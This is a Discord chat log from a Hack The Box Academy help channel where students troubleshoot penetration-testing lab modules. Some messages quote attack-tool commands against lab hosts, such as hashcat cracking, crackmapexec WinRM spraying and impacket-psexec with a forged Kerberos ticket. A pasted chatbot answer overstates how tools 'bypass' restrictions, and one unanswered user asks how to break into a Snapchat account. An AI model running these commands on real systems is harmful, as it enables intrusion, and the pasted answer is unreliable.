#modules

anyone know what is the problem

dont getting the flag

you should provide the module/section

my guess is that it's the wrong id

module Web Attacks / Mass IDOR Enumeration
i see that with burp i can go to the files, because i need to set the uid twice, but i have no idea how to develop a script which does this automated.
now have to do it manually and find the flag...but honestly, was somebody able to develop a script for that?

they provide a bash script in the section

yes which does not work

worked for me

it tried to use this script and customize it for this section, but no luck

really?

yeah of course.. it's a simple bash scripts that iterates through some numbers and curls with the uid parameter

i respawn the target....

doesnt work for me

my guess would be something with your script then, i believe i just used the provided script

i may have done it with burp

try curl -O instead of wget

no luck also with curl -O
i think theprovided script cannot work. becaus you must set the uid twice as i see with burp

did you set the number to 20 and change the ip

yes

i cant load the machine but i think it was a post request

thats what you also need to change

ok will try that. thanks for your help

Hi all,

I have a question about the first task in the Windows Event Logs module

Analyze the event with ID 4624, that took place on 8/3/2022 at 10:23:25. Conduct a similar investigation as outlined in this section and provide the name of the executable responsible for the modification of the auditing settings as your answer. Answer format: T_W_____.exe

The question asked an event happened on 8/3/2022 at 10:23:25, but at last, why we need to look at an event that happened after this one? Shouldn't it be an event before 8/3/2022 at 10:23:25?

Finally, students need to look at the event on 8/30/2022 10:23:49 AM:

thanks. okei in hindsight i should have thought of that. but honestly i thought my error is somehwere else... thanks!

Hi there ,
In active directory enueration and attacks module
In the LLMNR/NBT-NS Poisoning - from Windows section

I keep getting wrong password. eventhough I reset the box several times

sounds like you're using the wrong password

I tripple checked several times, and copied and pasted it into the freerdp command. I also tried rdesktop as well

nope if you get wrong password error its the wrong password

usually you get a hash not a password

check the section please it is a password

i don't need to

wrong password error = wrong password

I copied and pasted didn't type

you're doing something wrong, wrong password error = wrong password. without more information there's nothing more to it.

xfreerdp shows black RDP screen and then disconnects, rdesktop shows wrong password

you're telling me it says wrong password without providing any more context. so it's the wrong password.

xfreerdp shows a black RDP screen for a while ( 3 minutes approximatly ) then disconnects. with the following error
[03:44:37:294] [38141:38142] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:44:37:294] [38141:38142] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[03:44:37:319] [38141:38142] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[03:44:37:320] [38141:38142] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[03:46:39:265] [38141:38142] [INFO][com.freerdp.core] - ERRINFO_LOGOFF_BY_USER (0x0000000C):The disconnection was initiated by the user logging off their session on the server.
[03:46:39:265] [38141:38142] [ERROR][com.freerdp.core] - rdp_set_error_info:freerdp_set_last_error_ex ERRINFO_LOGOFF_BY_USER [0x0001000C]

rdesktop opens the RDP connection for windows and shows the message wrong password

did you press space bar at the black screen?

what's your xfreerdp command

ok now it worked after pressing the space bar

thank you very much

Anyone else experiencing a black desktop background when using remmina?

Could anyone give me a hint on Sightless priv escalation. been stuck for days and cant figure it out

Working on the following module
Analyzing Evil With Sysmon & Event Logs

After doing process injection and mimikatz password dump I still cannot find any log in Sysmon event logs with ID 7 or 10

INTERESTING. doing the "easy" LAB in Attacking Common Services. Really started to doubt myself. I mean, it's an easy lab after all. After exhausting all routes I could spot, while enumerated the server, I restarted and did the SMTP part all over again. Didn't find anything. so started reading Discord. Found out that the exact route I was taking should yield a valid username. So, after restarting again, dit the EXACT SAME COMMANDS, and finally I got the hit. So for everyone busting with this, just realize the LAB is not always working as expected. I needed three restarts. Frustrating though, since brute forcing is not the thing that teaches me most. It's just boring to wait for the process and I figure it's not that realistic anyway.

CBBH and CPTS modules are good, the CDSA modules suck a lot, Windows is super slow and the solution doesn't work as stated at all

Could anyone give me a hint on Sightless priv escalation. been stuck for days and cant figure it out
I have done, ssh -L 8080:admin.sightless.htb:8080 <user>@sightless.htb
also added 127.0.0.1 to admin.sightless.htb.
I get to the frox*** website login but nothing else

can anyone tell me why powershell.exe is not displayed as a managed process?

in the screenshot of the module Analyzing Evil With Sysmon & Event Logs, powershell.exe is dispalyed as a managed process

The spoolsv.exe is also not displayed as a managed process after the injection, I have confirmed that the injection has succeeded.

Assessment:Web Fuzzing --> cant find any parameter --> tried both GET/POST
Can someone give me a hint

Do I also have to fuzz "key" like -d "FUZZ=FUZZ2" ?

If so the list would be extremely extensive with over 3 millions combinations! --> guess that would be the wrong approach

Got it

Filter words was the wrong approach...

Has this module somehow totally been rewriten: https://academy.hackthebox.com/module/57/section/491

I had a question about the CDSA Module 3 area for Get-WinEvent, I understand -path, i understand Select-Object to get the required fields.

But I don't understand the {$_.Properties[21].Value part of the query.

The answers for all the skills assessment at the end of Module 3, immediately jump to a very specific Windows Event ID, and a very specific Property Field/Line of the query.

I don't get how they immediately know which Event ID and which Line of the Event ID is required to search for to find those specific IOCs

Is the old content of this module somehow still somewhere available?

I don‘t think so

So I have to redo the whole module again - somehow upsetting

All the notes are not valid anymore

They have no reference anymore

Web Attacks / Bypassing Encoded References
In the section is written:
Luckily for us, this is precisely the case in this web application.

If we take a look at the link in the source code, we see that it is calling a JavaScript function with javascript:downloadContract('1'). Looking at the downloadContract() function in the source code, we see the following:

Code: javascript
function downloadContract(uid) {
$.redirect("/download.php", {
contract: CryptoJS.MD5(btoa(uid)).toString(),
}, "POST", "_self");
}

but when i look at the source code i do not find this, is the lab something else...? or can i follow the example...?

and when i use the same bash script as in the section before i get the same flag again...

something wrong with the spawning?

Similar not the same. Try to read the source code and modify the script to your needs.

alright, but i do not find the hashing function...? in the section is written we find a hashing / encoding fucntion

If you read the source code you can see the encoding, hashing or whatever it is used.

this is the problem, i see no hasing function only:
function getDocuments(uid) {
$.redirect("/documents.php", {
uid: uid,
}, "POST", "_self");
}

The source code of the lab I was referring to. Is this from the lab?

this is from the lab yes, can i dm you?

sure thing.

cant access nibbles target ip, anhy help guys?

try changing vpn servers

i tried using the pwnbox different vpn but no luck , opened a ticket and will see.. thanks

Do I understand that correctly? You're complaining that you got new content and new labs for free?

Hi guys, I've got a theoretical question about Kerberoasting. This comes first due to the fact that at this point I'm no longer sure I've got what domain-joined means.
How am I supposed to perform this:

• From a non-domain joined Linux host using valid domain user credentials.
  If the host is not domain joined ?

like, is it possible to use a domain user credentials in a non-domain joined host? if yes, shall I simply specify the domain\user in my username and that's it, or are there specific techniques to perform it

Don't you do it every time you perform a Kerberos attack from your machine?

Never done it yet 🥲

That's basically what you are doing I mean

Depends on the tool you use

some will have -d flags for the domain. Impacket users [domain]/[username]:[password]@[IP or Hostname] format

oh alright, thus you need to rely on impacket

Depends on what you want to do

If it's Kerberoasting you can use CrackMapExec/Netexec as well

doing from a Linux host I mean

the point is, you basically have to impersonate a domain user on that domain from a machine which is outside the domain, practically speaking

leveraging different tools, as you suggest

Yeah.... kind of that

any recommendations? Tried `sudo neo4j start' and bloodhound still not finding the database

re enter the bolt://localhost:7687

i need to find a hacker IRL

i wanted to use darkweb or sth

Im doing a cybersec edu and don't understand half of it

read and study the material

still didn't work

database might not have started correctly

Hello, is it possible to get the password to a snapchat account using only the name?

i had to kill the process and start again. appreciate it

yeah it goes from basic cmdlet use to more advanced output transformation with powershell

just take it for what its worth and move on.

HTB academy showing me,
Has anyone encountered this issue?
Occuring when trying to start instance of pwnbox

try changing vpn server

its not a vpn

For this problem i am running the following command, but getting permission errors... find command cannot be used, but locate works fine

htb-student@nixfund:/etc$ find /etc -type f -name '*.config' -newermt '2020-03-03' -size +25k -size -28k -user root -exec ls -la {} \; 2>\dev\null
-bash: devnull: Permission denied
htb-student@nixfund:/etc$ 

Without error redirection, I am getting file permission errors...

find: ‘/etc/dovecot/private’: Permission denied
find: ‘/etc/ssl/private’: Permission denied
find: ‘/etc/polkit-1/localauthority’: Permission denied

if it's giving you permission problems, sudo it

it wants su password which i dont have

Which module and section?

https://academy.hackthebox.com/module/18/section/81

Try changing the file name. It may not be 'config' extension

https://en.wikipedia.org/wiki/Configuration_file

so i should include -name '*.*?

instead of *.config?

That wiki page has a couple you could try

in 2>\dev\null maybe you wanted to use /.

oh yeah thanks for pointing that out

helada... when i ran the same command but rather looked for *.conf instead of *.config it ran properly... but why the second one provides permission error?

did you run the command adjusting the \ to /?

How does someone even learn how to hack?

i didnt try and i think theres no longer any need

Because some of the directories you might be searching for files have different permissions and you might no be allowed to read them

Did you get the answer?

Ah! Now I understood what you asked. I thought you already knew, but it is how b5null said. That's why you get that permission error messages.

can we hop on dms rq

About?

I mean.... It will be better if it's pertaining the Modules to be asked here since more people might have the same question

Nah I was looking for help in a ctf

I cant figure out how the cryptography is working in general

for a problem

hey I have port that I don't know what it is it is open and it's inside a machine. how can see what its doing

what module?

its a box should I ask in there instead

yeah 🙂

thank you

https://academy.hackthebox.com/module/227/section/2500

SOC PATH -> MALWARE ANALYSIS -> Dynamic Analysis
I'm receiving the following output for the section walkthru, an error. It seems this is not how the walk thru si supposed to play out.

I've reset twice now and followed instructions to the letter

anyone else having major infra issues constantly? so sick of resetting machines when they stop responding, which sometimes happens <5m after spawning. Using pwnbox only on spawned academy machines only at this point. is it just me or ??

srsly considering requesting a refund at this point

depends on the module, but try contact support first

I have a ticket in

I'm sure you've tried this at this point but I was having this issue until I changed regions. It has been rock solid since. GL, I know it's frustrating.

Can someone give a sanity check on the exercise for:

https://academy.hackthebox.com/module/227/section/2500

neither the Section demo nor the exercise can be completed because of errors output by Noriben and blank logging by procmon See: #modules message

[SOLVED!!!]
In the kerberoasting attack chapter "Unconstrained delegation - Users" I replicated the attack and got the TGT for the DC01 users but in order to do that what should I do I tried Pass the ticket but no luck!! Any hints?
P.S I can perform dcsync and dump the available hashes.

on the skill assesment of Serverside attacks

i need to add it to etc/hosts, but even when adding it i cant access it

at least i think i need to add it

hi im currently doing the challenge for shells and payloads and the foothold it has you rdp to is just horrendously slow, is there something i can do to fix this or do i just gotta suffer thru it.

you can try changing vpn regions, also use the tcp vpn not udp

alrighty thanks im already on tcp but ill try switching regions later. gonna take a break for now

im uin skills assessment for Login Brutefroceing, Part1. Using the user and the pass list from the seclist like htb says. It takes loong time with both hydra and medusa, is the user and pass in the files?

medusa was doing wrong... or maby im doing medusa wrong, but dont get it.. iv used: medusa -h http://94.237.56.255 -n 35306 -U top-usernames-shortlist.txt -P 2023-200_most_used_passwords.txt -M http -m GET but medusa did this:

whar did i do wrong with medusa?

something with your medusa or lists are wrong

ah.. now i see

the list was saved like .txt but is .html .. thanx

Kerberos Attack - Constrained Delegation with Linux. I'm replicating the attack but when I psexec with the command

export KRB5CCNAME=./Administrator.ccache
impacket-psexec -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug

I get this error. I've tried the attack both in my VM and the PWNBOX but the error here is the same. I've added the domain name in the /etc/hosts as well. Any hints? I beleive this is related to PSEXEC script!

Hey guys i need help on the attacking comon servics module for the hard lab, i got the creds for rdp to the f**** user but when i tried to connect with sqlcmd to the mssql server with the creds it give me an error any hint?

Hello agin. Im in Part 2 off skill assemnet for Bruteforcing Login, i have the user and password for the SSH server, but it says : Permission denied (publickey) what to do? Im sure it is the ssh i need to get into to get the FTP user.. What im doing wrong?

nvm my bad aigin was using ssh standard port

Try mssqlclient

Hey, I need some help with the IPMI page under footprinting module

What is the account's cleartext password?
Should I run hashcat against the hash that has been founded?
Because the estimate time for that is 3 days
||hashcat -m 7300 hc_pass.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u --username||

are you using proxychains through a pivot?

Did metasploit not crack it for you?

nope

Use hashcat then

in the module they are showing this command hashcat -m 7300 ipmi.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u which bruteforces all possibilities

but it seems overkill

Just use a wordlist

Woop Woop:)

Hey guys I need some help,I've wanted to learn about hacking for a while now but it's hard to find valid information and I can't afford any programs or schools could anyone please just help me with some basics,I've done some coding but that's about as much as I am capable of at the moment,it's not good either, please can anyone assist me with this if possible,I would really appreciate that🙏

i receive an login failed

Can anyone help me on Question 2 of Web Service & API Attacks - Information Disclosure (with a twist of SQLi) without using sqlmap? Thanks!

hey felles, can I get some help with the XSS module the skill assessment?
https://forum.hackthebox.com/t/cross-site-scripting-xss-skills-assessment/274074/8
I have exatcly what the last guy is having,
the victim sever is GET my malicious script but nothing happen :X

what is the error

need to see the payload

also it looks like the script.js has a weird looking single quote

its ok but there is one thing i dont understand, on the server they bot dont have the sysadmin role, but john can execute the command on the linked server but not fioan how can i check that?

you basicaly could do some of the basic courses of htb academy

also you cold do the active machines from the original htb website (they are free), by watching videos, read about the tools they use and try and error alot

-dc-ip

wym?

dm me it

Anyone have you done "ACTIVE DIRECTORY TRUST ATTACKS" module?

Yes

doing file transfer methods module and got the flag but why use wget http://<ip>/flag.txt

how to come to knw that we need to wget i mean we dont have creds for ftp server , nor for ftp , nor we knw smb

what does that have to do with ftp or smb?

cause its file transfer methods we can download file from ftp but i cant connect with it and in smb there is share directory nor do i knw the name of that directory so how come to we knw that we need to wget?

because the question said so?

it doesnt say use ftp or smb in the question

yeah but accesseing the server from the web give 403

because it wants wget

i think its looking for specific user-agents

i need more logical and solid explation i mean i done the module but still its bugging me

bro thats the explanation

i tried curl with different user agents and it gives me the flag if i change it from mozilla

why not chatgpt wait

It's downloading from the web server.

web root means, the webserver's root dir

oh now makes sense so its mean i have to download the flag.txt file from the root directory of the webserver

thanks alot

why didnt u just ask what wget was bro 😭

but why only wget i mean if i browse ip/flag.txt on browser it will work the same?

brooo the problem was that i dont even knw the problem

Let's say that there is a web server running from /home/waleed.
here, webroot is waleed's home dir.

hmmm

its filtering out mozilla user-agents

shoot

A 403 Forbidden error typically means that the server understands your request but refuses to fulfill it. Here are some reasons why this might happen:

Directory permissions: The web server might have specific permission settings for certain directories or files, restricting access to browsers but allowing access through command-line tools like wget. The server could be configured to prevent directory listing or accessing files from certain IP ranges or user agents (browsers).

User-agent restrictions: Web servers can be configured to block requests that come from common web browsers. wget uses a different user-agent string by default, which might be allowed by the server. The server might only respond to specific types of requests that wget can send, while blocking standard web browsers.

Access control: The server could have access control rules that are based on the request method or the type of request being made. For example, direct browser access might be blocked for security reasons, but HTTP tools like wget can still retrieve the file.

File-level security: Sometimes, files are protected and can’t be accessed directly via a browser interface (due to lack of proper authentication or authorization). However, command-line tools can bypass these restrictions when they are less strictly enforced.

How wget Helps Overcome This:
When using wget, you are making a direct HTTP request to the web server for the specific file, bypassing the browser's request handling and potential restrictions.
Since the server might be configured to respond to a simple GET request from tools like wget, you're able to access and download the file successfully, even though a browser returns a 403 error.```

Well chat gpt gave you the answer.

thanks simon broo alot

@safe star thanks to em

it was bugging me

😄

yeah him too @safe star and thanks alooooot to you too you been bearing me for quite a some time

opps, my bad agin, wrong path to list

dam, this ffuz tool is not good

ffuf is amazing

maby just me dont get it.. i was need to use dirbuster to solove the lab, did not get it workging with ffuf

why i dont get a list with directorys ? what im doing wrong?

Hi! someone can help me with the "windows lateral movement" module skill's assessment?

I'm stucked for 2 days and starting to think it's bugged

Can’t see the command and use -ic to remove comments

ffuf -w /home/julle/Dokument/HTB/WebApplications/Ffuf/directory-list-2.3-small.txt -u http://94.237.63.104:41481/FUZZ/

Did you restart the machine

Worked for me

doesn't look like your target is up

it is.. it going fine with dirbuster

ah.. w8

the target was down.. sorry

it was timeout :S

now it run as it shuld

thanx

Messages like that removed as spoilers previously @rustic sage, so just following that.

Try to ask if anyone can give you a nudge on where you are stuck, but do not include specifics like that publicly.

alright!

Thanks

Anyone done the soc path I'm having trouble getting proper output from noriben

#modules message

nah but you can google it though maybe you find something

i did google around for the error i was getting not much help

what is the error

let me check, my pwnbox already termianted

https://media.discordapp.net/attachments/774040263278592041/1297237509088084088/image.png?ex=67153213&is=6713e093&hm=e9398d0c4adb1cd00e225831953f9ce0b177861c868020627c600d5c732966b8&=&format=webp&quality=lossless&width=1030&height=538

basically its failing to create/save the csv file then it fails to open it (the actual error seen)

Trying to do one of the early pen test modules where you use nmap to scan and see a version at a port and this is what I get as a result 8080/tcp open http-proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at.

check windows defenderis off or not it some time mess with the filing

mmm good tip

what cammand you ran send ss

try and tell

checking now

what section

service scanning

command?

why is that the only port? need to see what you put

i just scanned and port 8080 didnt even appear

I am working on getting the screenshot uploaded

just send the nmap command

just snd comand or use -A simply

nmap -sV -p8080 10.129.244.85

when you get stuck always use nmap -h

scan all ports not just 8080

okay, I was doing that but it specifically asked for 8080 which is the port having an issue. I could see the versions on the other ports

I got the rest of that lesson done, just not that part

is this service enumeration from nmap module?

it is this module https://academy.hackthebox.com/module/77/section/726

yeah it is

oh yeah i remember

sometimes you need to grab the banner of the service to know its version like ftp,

use netcat for that purpose

okay I will try that

i got something different

also scan all porssible ports or at least top 1000

yeah its xxxxx port

What did you get?

try scanning with -A

okay will do

i got the answer with the same command as you

told ya

okay will do

in some cases -A flag gives you nothing in that scenario you have to grab the banner of the service if you can connect with that

worked?

just getting rdps

rdpd*

ohk

looks like defender and all other security is disabled by default (gpo)

trying the demo again

maybe another process using that file that can be a possibility

there terminate procmon?

The directions say to do it like that, i've tried exiting it manually and just pressing ctrl+c in noriben to let it terminate proc mon itself

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Windows\system32> cd C:\tools\Noriben-master\
PS C:\tools\Noriben-master> ls


    Directory: C:\tools\Noriben-master


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         6/18/2023   1:09 PM                images
d-----         6/18/2023   1:09 PM                Sample
-a----         6/18/2023   1:09 PM          10777 LICENSE
-a----         7/28/2023  12:46 AM          69956 Noriben.py
-a----         6/18/2023   1:09 PM            509 NoribenConfigExample.ini
-a----         6/18/2023   1:09 PM           3475 NoribenRead.py
-a----         6/18/2023   1:09 PM           1786 NoribenSandbox.bat
-a----         6/18/2023   1:09 PM          20046 NoribenSandbox.py
-a----         6/18/2023   1:09 PM           2370 NoribenSandbox.sh
-a----         6/18/2023   1:09 PM            201 postexec.txt
-a----         6/27/2023   4:55 PM        2714008 Procmon64.exe
-a----         6/18/2023   1:09 PM          16189 ProcmonConfiguration.pmc
-a----         6/18/2023   1:09 PM           6129 README.md


PS C:\tools\Noriben-master> python .\Noriben.py

--===[ Noriben v1.8.8
[*] Using filter file: ProcmonConfiguration.PMC
[*] Using procmon EXE: C:\ProgramData\chocolatey\bin\procmon.exe
[*] Procmon session saved to: Noriben_19_Oct_24__18_20_049113.pml
[*] Launching Procmon ...
[*] Procmon is running. Run your executable now.
[*] When runtime is complete, press CTRL+C to stop logging.

[*] Termination of Procmon commencing... please wait
[*] Procmon terminated
[!] Error detected. Could not create CSV file: Noriben_19_Oct_24__18_20_049113.csv
[*] Exiting with error code: 7: Error creating CSV
PS C:\tools\Noriben-master>```

Thank you for the help, I got it now

thank you for the help, I just got it

with -a or banner grabbing with netcat?

open Noriben.py and change the .exe used

@safe robin so interesting enough it worked when I used the vm built into the site and not the one I use on my pc

the procmon exe?

try manualing converting the .pml to csv

yea. it's using procmon in a folder that you can't write to

forgot where the procmon you're supposed to use is

this line?

yeah it happens sometime

yea that one

i have a procmon64.exe in the same dir as noriben, its prob that?

yep, put the absolute path to that

or relative path should also work

ah, gg, working

@dim wolf sorry to be a bother, the next demo is doing the exact same thing, just with procmon itself instead of noriben + proc, im using the procmon64.exe in the noriben folder and set up the filters like the demo shows but no results... blank log capture

ah, yea unfortunately i don't remember how i fixed this and i don't have access to my notes atm

that screencap has the Success spelt incorrectly i fixed it SUCCESS and re-ran still same thing, no output

hrm...

ok looks like i dont need it to complete the exercise (thankfuly) im gonna move on, maybe i can check in with you in a day or two when you have access to your notes if you wouldnt mind checking?

hopefully i'll have access

Sorry this reply is 2 weeks late, but I do have some time-saving tricks up my sleeve when it comes to this ― in the form of scripting.

arch with pwnbox styling?

Honestly don't remember the conversation, but will scroll up

And KDE Plasma 6 instead of MATE, but apart from that, yes.

Cool 🙂

Hello folks, I am new to HTB, on SIGHTLESS sqlpad page not launching, any one have same issues.

#boxes would be the place to ask. If you can’t access it, read #welcome and #rules

What is modules chat for?

HTB Academy modules, if you need any help understanding questions/exercices

Click/press the channel name and the “topic” will pop up

Thank you @storm elk !

You’re welcome, many people there should be willing to help

Hi,

I am doing
Module: Attacking Common Applications
Section: Attacking Thick Client Applications
Section Link: https://academy.hackthebox.com/module/113/section/2139

The process of retrieving the hard-coded credentials feels overwhelming. Too many application specific things. Are there any other resources that I can refer to so that the section becomes a little more digestable?

Does a pretty good job of duplicating the experience ― with the added benefit of 60Hz refresh rates over 4K HDMI with Nvidia graphics, something Wayland supports but Xorg does not.

Hello,

I am working on this machine and can't seem to figure out what to do next. I was already able to mount the machine and find credentials for the alex user, but can't figure out what to do next.

From nmap, I've tried to access SMB, winrm and RDP, but with no luck on either.

During enumeration of RPC I've found shares ADMIN$, C$, IPC$,Users and devshare with no ability to access any of them.

I also found users that imply there is SQL on the server, but haven't been able to even identify what port it would be on as usual MySQL and MSSQL ports aren't working and -p- on nmap didn't reveal anything for that either.

I am using pwnbox and have been working on this for a couple of days now. Any advice? I'd prefer less spoilers if possible, but I am open to articles or write ups(for other machines). If the content I need to solve this is within the course then I'd be happy to continue using only that as resource.

Thank you.

^^^Medium Footprinting Lab^^^

is smb down or not?
If not try enum4linux

I tried enum4linux and it showed me the shares, but my credentials for the alex account didn't let me log on

Got any other credentials or account? Try password spraying

it's the Footprinting module. password spraying is out of scope

all skill assessments can be solved with just the course content

i don't have any notes for this but i recommend rereading the sections for the services you found

have you enumerated again once you got valid credentials

I am following the steps given on the section. I have removed the permission to Delete subfolders and files for the cybervaca user. However, the .bat file generated on the Temp directory still gets deleted and I can only see the .tmp file.

┌─[eu-academy-5]─[10.10.14.66]─[htb-ac-1117172@htb-hipmc8lkol]─[~] └──╼ [★]$ smbclient -L //10.129.20.42 Password for [WORKGROUP\htb-ac-1117172]: why is it asking password for my pwnbox? what is it?

Hi, im doing sightless and I have come to the point to get root. I have portforwarded so I see someone logging into the admin panel. But how do I catch the credentals?

Try asking in #boxes

sounds like there are still delete permissions granted, otherwise it wouldn't be able to delete the files

I dont have access to that channel @cloud urchin

read and follow the steps in #welcome

try changing the 2 directory permissions

I still don't understand Cybervaca's process to this day

Reversing is its own topic/field honestly

you need a password to list shares

its asking for the your user password

The first thick client part was simple but that second part...

I mean how do I know password for my pwnbox?

you are asking to list shares as that user so it wants a password

its not your pwnbox password

you might as well put an empty password since you already know your username doesnt exist on the target server

you're using the wrong account for the smbclient command i think

you typically dont use smbclient for yourself.

yeah, only to check if it allows null sessions

Hi Guys ! im new to HTB, I'm trying to unlock the module in HTB Academy with the cubes I've, but icouldn't able to unlock it. please guide me through this issue.

Talk to support

@old oasis Sure will do that.

(https://help.hackthebox.com @rustic sage, chat button bottom right)

It is the weekend however, so response may be delayed

Deactivate all AdBlockers and try again

@acoustic owl It satarted to work after deactivating it. Thanks for the response.👍

Thanks for the guidance

I like to say thanks @Everyone for being helpful!

Some one from Sweden?

hey bud i am on the same question stuck rn it just takes some time and doens't give out nay output, did you find the soln to that ?

yes i did.

could you please direct me in the right direction?

idk what am i doing wrong i am not able to retrieve any output from crackmapexec

i am using the right resources tho

@grand portal

what command are you using?

crackmapexec winrm 10.129.49.250 -u /home/user/Desktop/username.list -p /home/user/Desktop/password.list

and will connect using evil-winrm after this (as of now that aint working if i use the lists)

do you know if the target is linux or windows?

windows

i ran a nmap scan just in case the services are not located on the usual ports

are you not using pwnbox? your command looks like it runs from cmd windows.

yes i am not using pwnbox

i am doing it from personal box i am connected to vpn tho

not windows but parrot os virtualbox

how long have you been waiting?

for cracking.

like 7-8 seconds per command and it just doesnt give out any output

ok it is working on pwnbox

but it is very very slow

yes, that's what password attack module is.

it feels like it might never complete

slow

send me ss of how the command you ran

could it be becasuse of default threads ?

just wait for a while

you can change threads manually -t 48

like this

yes i did that but it didnt work

im trying at my end. let's see.

okk thankyou'

what section is that?

i looked back in my notes, it was written as too easy, nothin to write im a fool if i get stuck on this, lol

lmaooo

Password attack, Network services.

IT IS EASY just didn;t work on normal machine and too slow w normal command

are you able to crack username and password using pwnbox?

yes it is working but too slow

bruteforcing takes time.

you used the resources given in the module?

it is running since 5 mins now

yes.

yup

sometimes it takes hours.

in the module, its usually under 30 minutes, if you are using correct wordlist

its shouldnt take hours

but i expected it to be faster/simpler in this module

Yeah.. it should not take that long. Go back through the section, make sure you are using the correct wordlist.

yes it is the correct list its just idk why it didn't work on my virtual machine

he is not that far in module, where choosing wordlist is crucial part. its first time using normal resources.

even crackmapexec annoyed me alot in installation the git clone wasnt working pip3 wasnt working after 2-3 hours git clone worked somehow but --recursive didnt work so i had to use it with poetry in the venv

thats true

found the password thankyou

yeah? that's good.

so should i just complete this whole module in pwnbox ?

nmap module had the same issues

It would be a good idea I think. I only use my own VM if pwnbox gives me issues which is rare

I see the issue, if you installed crackmapexec with pip3, it will only with virtual environment, because it's installation packages are seperated from system ones.

alright, thankyou for the help

it didnt even install with pip3

with what then?

i had to install pipx then using pipx install poetry and then install the build

yes. if you were'nt able to see passwords being bruteforced, it means crackmapexc is not working.

i got the password too.

just cracked it again.

Hi all, just working through the command injections module. On the bypassing blacklisted commands task we are required to character insert for the cat command which I understand how to do, but the final payload to get the flag requires 2 operators to be bypassed before providing the command payload. Can anyone point me to where it teaches us that we may have to use 2 operators before a command?

yup

I was trying the exact payload for 30 minutes, minus the second bypassed operator - it seems they left this vital part out?

good luck with rest of the module.

thankyou bud

here is unwanted advice, before you ask for help. try different wordlists.

okk will do thankyou

Does anyone knows good chisel_proxychains connection commands to be able to perform full nmap scan on some machine in the internal network? the commands I use may be able to perform some simple operations on said machine, but not nmap scan (or basically any operation on any service, including brute force)

module and section.

General question, can apply for all modules with pivoting use.

oaky

@real delta check dms bro 😭 🙏

No

Thanks for reminding me that I clicked "ignore DM"

np gang

That's another way of me saying that no I didn't accept your DM and won't accept any from you 😄

Don't dm people unwanted, read #rules & #welcome to verify yourself 🙂

ok?

aight

damn.

Module: Windows Privilege Escalation
Section: Credential Hunting
Link to section: https://academy.hackthebox.com/module/67/section/640

Near the end of the section, it states:

then we can recover the cleartext credentials from encrypted.xml.

Is this a mistake? Did it mean pass.xml?

Intro to Academy module. "What is an exercise? the docker target does not load at the ip given in firefox or chromium

For a target from a Docker container, you need the IP and the port

like 10.10.10.10:1234

I was putting the full address and the port but I still couldn't get it to load

I'm connected to the vpn fine because I'm currently doing another task connected to a virtualised HTB windows machine

for Docker Targets you don‘t need a VPN Connection

Even in academy? Someone told me in general that you need one. Anyway, I tried it with and without an openvpn

On firefox it's a grey page. On Chromium it will say This page isn't working ERR_Empty_Response

what module and section are you working on?

Academy module. "What is an exercise? literally the first one that introduces a docker target

Right now I'm doing the file transfer module and everything is working fine. I can nmap the target. I can wget from the target. No issues

I just tried it. It works fine for me. Also I don't think you can have two machines up at the same time so if you doing two modules at the same time then that might be the issue

The only other thing I can think of which sometimes causes random issues like this is my tunnel to a proxy server on my router that is routing all traffic. If so, is there anything I can add to my whitelist?

The whitelist of stuff that wont be sent down the tunnel

obviously I don't want to add every single ip manually

I tend to use the pwnbox more often. The VPN can bring a lot of headaches at times so I tend to avoid it.

I was using something similar on THM and I'm just really trying to get away from this method due to how slow it is. Trying to work with burpsuite in a virtualised machine accessed through a browser is horrible.

Skills Assessment: Login Brute Forcing Part 2:https://academy.hackthebox.com/module/57/section/516
Have to find out the ftp username --> guess I have to use the tool:anarchy to craft ftp usernames
anarchy needs first and last name --> dont have lastname just username****ssh --> what lastname do i have to give anarchy? Maybe wo? --> any hints

The pwnbox is much faster than the one from THM

I'm on the skill assesment of the OS inyection Module and everytime i add a space to the payload (+,%09) the page crashes and it says NOT FOUND and have to reset the target. Is the payload meant to have no spaces? Or is there something wrong on the server side here?

Module: Pivoting, Tunneling & Portforwarding

Are the payloads generated by msfvenom working for anyone? In the windows host triggering the payload wasn't stable I would get a shell for a second and it would close. For the linux host I get segmentation fault (core dumped).

Using metepreter?

actually *****ssh is the username only no need to use anarchy

Are tou sure that's the name?

Os inyection

But anarchy is the method so why not use it...

And the user you need anarchy for is not ssh is for the ftp user

to find the ftp user the username and password you need to brute force have the username ____ssh

yes

That is not the username, just try to look at the directories when u acces the ssh

exactly

and to get the password for the ssh login you need to brute force on the one given at the end of skill assessment 1

Command inyections sorry

Idk why when adding a space to the payload it crashes

if you want, DM me your request/response and i'm happy to take al ook

and a link to the assesment, so i can review the info and my notes

@dawn bloom ^

Okay

What decompression software is installed on the boxes?

The question wants me to upload a .zip file to a target, ssh in then unzip it

But unzip isn't installed and gzip wont decompress a zip

try 7zip

you can always unzip it first then send it using scp

thats what I did in the end lol

With the windows example I dunno if I cheated but I just took the contents of the .txt file. And copy pasted it to the RDP of the windows machine. It did say "Use your upload method of choice"

yeah if you rdp you can also create a shared folder for easy transfering of files

The main method I've been "uploading" scripts to compromised targets in other CTFs is just copy pasting the script text to a new file on the target tbh

Rather than do any kind of upload or file transfer

i believe its unzip ? which gunzip ?

does which work for wildcards which *zip* ?

no, if you do that the shell is going to interpret that as looking for files in the local directory matching the pattern zip

*zip*

try apropos zip maybe if you are looking for a command matching that pattern

actually maybe it will work haha nevermind i'll go back to lurking

no which *zip* doesnt work (for me, zsh) i think apropos is the ideal solution here

i always forget about that one (sorry i dont speak french)

is there a binary which we can use to transfer files from windows machine to linux exclude ssh bcz ssh-agent is not working i dont now why

Created a custom wordlist with the user found on the ssh box by using the tool user-anarchy
As password list i used the one on the box --> no valid results for a ftp user
Skills Assessment: Login Brute Forcing Part 2:https://academy.hackthebox.com/module/57/section/516

?

There is a directory of an email talking about the user u looking for, it says like he was transferring files or something like that

I’m new to this where do I start

